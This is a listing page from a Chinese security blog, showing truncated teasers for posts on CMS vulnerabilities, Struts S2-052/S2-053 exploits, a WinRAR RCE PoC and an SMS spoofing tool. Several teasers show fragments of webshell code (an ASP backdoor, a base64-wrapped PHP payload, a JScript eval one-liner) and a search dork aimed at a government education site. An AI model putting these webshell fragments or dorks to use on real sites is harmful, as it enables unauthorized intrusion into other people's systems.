颓废's Blog - 第 17 | CN-SEC 中文网

某政府教育网站0day

inurl:printpage.asp?ArticleID= 在后台版权信息栏里写入小马 if Request(“pass”)=”520″ then dim allen,creat,text,this...

05月19日颓废's Blog651 views评论

阅读全文

帝国cms 6.6漏洞

自定义页面-增加自定义页面-随便写个.php文件名，内容写：<script language="php">echo base64_decode("PD9waHAgQGV...

05月19日颓废's Blog767 views评论

阅读全文

颓废's Blog

W78cms网站管理系统漏洞

W78CMS企业网站管理系统是一套用的比较多的基于ASP程序的网站管理系统，在中国站长站的源程序下载量突破了一万一千次。前几天在tOOls.net看到有人公布了一个W78CMS企业...

05月19日1,195 views评论

阅读全文

sa权限获取webshell思路

echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe")...

05月19日颓废's Blog439 views评论

阅读全文

阿曼达cms漏洞

...

05月19日颓废's Blog599 views评论

阅读全文

颓废's Blog

短信伪装精灵,伪装短信生成器,可自定义收发任何短信内容

打码是因为不能带广告性质谢谢理解文件名稱：响应国家号召，禁止资源下载

05月19日2,389 views评论

阅读全文

动科(dkcms)漏洞

官方网站：www.dkcms.com 主要是差不多3个版本为主吧， V2.0 data/dkcm_ssdfhwejkfs.mdb...

05月19日颓废's Blog543 views评论

阅读全文

汇成企业建站CMS系统漏洞

05月19日颓废's Blog707 views评论

阅读全文

颓废's Blog

FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行多个漏洞

注册个用户，修改头像，选择一张图片马：抓包，修改post中tx参数中的jpg为php：

05月19日1,272 views评论

阅读全文

颓废's Blog

S2-053漏洞重现(附exp)

打开页面，输入表达式%{33-1}进行测试，发现成功执行，返回32：利用exp创建账户，exp如下：

05月19日425 views评论

阅读全文

颓废's Blog

S2-052漏洞分析及官方缓解措施无效验证

相关链接如下： https://cwiki.apache.org/confluence/display/WW/S2-052 影响版本： Struts 2.1.2 - Struts ...

05月19日481 views评论

阅读全文

WinRAR 压缩工具可执行远程代码漏洞poc

未修复可利用

05月19日颓废's Blog465 views评论

阅读全文

某政府教育网站0day

帝国cms 6.6漏洞

W78cms网站管理系统漏洞

sa权限获取webshell思路

阿曼达cms漏洞

短信伪装精灵,伪装短信生成器,可自定义收发任何短信内容

动科(dkcms)漏洞

汇成企业建站CMS系统漏洞

FineCMS V5.0.10 任意文件上传&&任意代码执行&&任意SQL语句执行多个漏洞

S2-053漏洞重现(附exp)

S2-052漏洞分析及官方缓解措施无效验证

WinRAR 压缩工具可执行远程代码漏洞poc

在线咨询

微信